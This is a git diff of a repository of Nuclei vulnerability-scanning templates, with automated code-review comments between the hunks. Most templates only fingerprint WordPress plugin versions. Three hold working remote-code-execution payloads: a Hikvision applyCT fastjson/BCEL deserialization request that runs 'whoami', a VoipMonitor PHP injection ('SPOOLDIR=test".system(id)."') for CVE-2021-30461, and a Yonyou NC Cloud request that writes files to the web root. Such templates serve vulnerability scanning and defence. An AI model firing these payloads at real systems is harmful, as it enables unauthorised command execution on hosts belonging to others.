@@ -0,0 +1,59 @@ +id: whmpress-0d5977b07c81b352711972147990171c + +info: + name: > + WHMpress <= 6.2-revision-5 - Missing Authorization to Authenticated (Subscriber+) Settings Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d264e88-7137-48ff-8ce3-5fff77e2474a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/whmpress/" + google-query: inurl:"/wp-content/plugins/whmpress/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,whmpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "whmpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2-revision-5') \ No newline at end of file diff --git a/poc/other/whmpress-a7309bcc642848ac99c10a4311b79606.yaml b/poc/other/whmpress-a7309bcc642848ac99c10a4311b79606.yaml new file mode 100644 index 0000000000..668bfc084d --- /dev/null +++ b/poc/other/whmpress-a7309bcc642848ac99c10a4311b79606.yaml 
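Review bot: The `version` extractor regex `(?mi)Stable tag: ([0-9.]+)` stops at the first non-digit, so if the plugin readme reports `Stable tag: 6.2-revision-5` the captured value is `6.2`, and `compare_versions(version, '<= 6.2-revision-5')` then compares a bare `6.2` against a string with a hyphenated suffix; if the version library treats that suffix as a pre-release it sorts below `6.2` and the matcher can fail on exactly the version the template targets. Either widen the capture, e.g. `- "(?mi)Stable tag: ([0-9][0-9A-Za-z.-]*)"`, or compare against `'<= 6.2'` and state the suffix in the description. The second WHMpress template in this commit (`whmpress-a7309bcc…`) uses the same regex and bound and needs the same change.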
@@ -0,0 +1,59 @@ +id: whmpress-a7309bcc642848ac99c10a4311b79606 + +info: + name: > + WHMpress <= 6.2-revision-5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5dea4293-0496-4cee-9d8a-c15beaa51b14?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/whmpress/" + google-query: inurl:"/wp-content/plugins/whmpress/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,whmpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "whmpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.2-revision-5') \ No newline at end of file diff --git a/poc/other/woo-products-widgets-for-elementor-0a67d2084052f8465a297fc9f6da1cd3.yaml b/poc/other/woo-products-widgets-for-elementor-0a67d2084052f8465a297fc9f6da1cd3.yaml new file mode 100644 index 0000000000..9378c5dce7 --- /dev/null +++ b/poc/other/woo-products-widgets-for-elementor-0a67d2084052f8465a297fc9f6da1cd3.yaml 
@@ -0,0 +1,59 @@ +id: woo-products-widgets-for-elementor-0a67d2084052f8465a297fc9f6da1cd3 + +info: + name: > + Woo Products Widgets For Elementor <= 2.0.0 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8336c89-44ac-4e41-bc81-7dae9599c050?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-products-widgets-for-elementor/" + google-query: inurl:"/wp-content/plugins/woo-products-widgets-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-products-widgets-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-products-widgets-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-products-widgets-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/other/zephyr-project-manager-63c4e07d0eb40c0087ebfd55ecaddec5.yaml b/poc/other/zephyr-project-manager-63c4e07d0eb40c0087ebfd55ecaddec5.yaml new file mode 100644 index 0000000000..e39ecb9713 --- /dev/null +++ b/poc/other/zephyr-project-manager-63c4e07d0eb40c0087ebfd55ecaddec5.yaml 
@@ -0,0 +1,59 @@ +id: zephyr-project-manager-63c4e07d0eb40c0087ebfd55ecaddec5 + +info: + name: > + Zephyr Project Manager <= 3.3.100 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/98a73a02-33fa-4dd4-9606-3d35d58c2398?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/zephyr-project-manager/" + google-query: inurl:"/wp-content/plugins/zephyr-project-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,zephyr-project-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "zephyr-project-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3.100') \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 7f081b05e0..0ebd67934b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml 
@@ -1,48 +1,27 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file + name: HIKVISION author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' - http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" - Content-Type: image/jpeg - - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- - - - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: res_id - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - "nt authority\\system" diff --git a/poc/remote_code_execution/envo-elementor-for-woocommerce-6b875373ec6b41b7d90e0812ce65132b.yaml b/poc/remote_code_execution/envo-elementor-for-woocommerce-6b875373ec6b41b7d90e0812ce65132b.yaml new file mode 100644 index 0000000000..45c687f8ab --- /dev/null +++ b/poc/remote_code_execution/envo-elementor-for-woocommerce-6b875373ec6b41b7d90e0812ce65132b.yaml 
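Review bot: The `name:` is reduced to `HIKVISION` and the context line `id: HIKVISION` stays as a generic, non-unique identifier even though the file now tests a different endpoint (`/bic/ssoService/v1/applyCT` rather than the former upload path), so scan output no longer says what was checked and any other Hikvision template in this repo with the same id collides with it; use a descriptive pair such as `id: hikvision-applyct-rce` and `name: HIKVISION Comprehensive Security Management Platform - applyCT Command Execution`. The request sends `Testcmd: whoami` and the only matcher is `words: - "nt authority\\system"`, so the template actively executes a command on the target and only reports on Windows hosts running as SYSTEM; the one-line `description:` should state that it is an intrusive check rather than a fingerprint, and the file still has no `reference:` entry for the advisory it is based on. The `matchers:` list also has no `matchers-condition` or status check, which the removed version at least constrained via its DSL comparison.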
@@ -0,0 +1,59 @@ +id: envo-elementor-for-woocommerce-6b875373ec6b41b7d90e0812ce65132b + +info: + name: > + Envo's Elementor Templates & Widgets for WooCommerce <= 1.4.16 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7abb5103-7063-4a8d-8ca0-66074954acd5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/envo-elementor-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/envo-elementor-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,envo-elementor-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/envo-elementor-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "envo-elementor-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.16') \ No newline at end of file diff --git a/poc/remote_code_execution/order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3.yaml b/poc/remote_code_execution/order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3.yaml new file mode 100644 index 0000000000..dbc57b1c9f --- /dev/null +++ b/poc/remote_code_execution/order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3.yaml 
@@ -0,0 +1,59 @@ +id: order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3 + +info: + name: > + Order Export for WooCommerce <= 3.23 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e3f8108-6b1b-4720-a450-e58b1833b608?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/order-export-and-more-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/order-export-and-more-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,order-export-and-more-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/order-export-and-more-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "order-export-and-more-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.23') \ No newline at end of file diff --git a/poc/remote_code_execution/voiprce.yaml b/poc/remote_code_execution/voiprce.yaml index b8e046e7d5..c7a522674d 100644 --- a/poc/remote_code_execution/voiprce.yaml +++ b/poc/remote_code_execution/voiprce.yaml 
@@ -4,14 +4,9 @@ info: name: VoipMonitor Pre-Auth-RCE author: shifacyclewala,hackergautam severity: critical - description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor. - + description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461. + tags: cve,cve2021,rce,voipmonitor reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-30461 - cwe-id: CWE-94 requests: - raw: @@ -19,7 +14,11 @@ requests: POST /index.php HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close Content-Type: application/x-www-form-urlencoded + Content-Length: 35 SPOOLDIR=test".system(id)."&recheck=Recheck diff --git a/poc/remote_code_execution/woocommerce-ac6e420a89669f08a078e821281eeac7.yaml b/poc/remote_code_execution/woocommerce-ac6e420a89669f08a078e821281eeac7.yaml new file mode 100644 index 0000000000..f919bcb9f1 --- /dev/null +++ b/poc/remote_code_execution/woocommerce-ac6e420a89669f08a078e821281eeac7.yaml 
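Review bot: The new side deletes the whole `classification` block (`cvss-metrics`, `cvss-score: 9.80`, `cve-id: CVE-2021-30461`, `cwe-id: CWE-94`), so the CVE identifier now survives only as free text in `description` and as the `cve2021` tag, and tooling that keys on `classification.cve-id` loses the mapping. Keep the block alongside the new `tags` line instead of removing it. The rewritten description also reads `Un authenticated`; `description: Unauthenticated remote code execution in VoIPmonitor via user-supplied data reaching the web interface (CVE-2021-30461).` keeps the precision of the earlier wording.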
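Review bot: The added `Content-Length: 35` does not match the request body on the following line, which is 43 bytes long; if nuclei honours an explicit header in a raw request rather than recomputing it, the server reads a truncated body and the check silently stops matching. Drop the header and let the engine compute it, or set it to the body's real length. The `requests` block continues past the end of this hunk.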
@@ -0,0 +1,59 @@ +id: woocommerce-ac6e420a89669f08a078e821281eeac7 + +info: + name: > + WooCommerce <= 9.1.2 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ad4272c-75a1-4bc9-be3b-add80de45871?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woocommerce/" + google-query: inurl:"/wp-content/plugins/woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.1.2') \ No newline at end of file diff --git a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml index cef49f23fa..653783158e 100644 --- a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml 
@@ -1,36 +1,43 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: yonyou-nc-cloud-jsinvoke-rce - author: pphua + name: Yonyou NC Cloud - Remote Code Execution + author: Co5mos severity: critical - tags: yonyou,nc-cloud,rce - reference: - - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA + description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. + reference: + - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" + tags: yonyou,rce + +variables: + str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} + - | - GET /{{randstr}}.txt HTTP/1.1 - Content-Length: 138 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + GET /{{str1}} HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and matchers: - type: word + part: body words: - - "StringObject" - part: body \ No newline at end of file + - '5d8be7535d6383e99315739724e10fa7' + + - type: status + status: + - 200 \ No newline at end of file 
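Review bot: The expected marker `5d8be7535d6383e99315739724e10fa7` in the word matcher is hard-coded while the request computes it as `{{md5('yonyou-nc-cloud-jsinvoke-rce')}}`; if either side is edited they drift apart silently and the template stops matching. Define it once under `variables`, e.g. `marker: "{{md5('yonyou-nc-cloud-jsinvoke-rce')}}"`, and reference `{{marker}}` in both the request body and the matcher. The template also writes `webapps/nc_web/{{str1}}` on the scanned host and never removes it, so `description` should state that a marker text file is left in the web root for operators to clean up after a scan; `str1` would also read better as `marker_file`.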
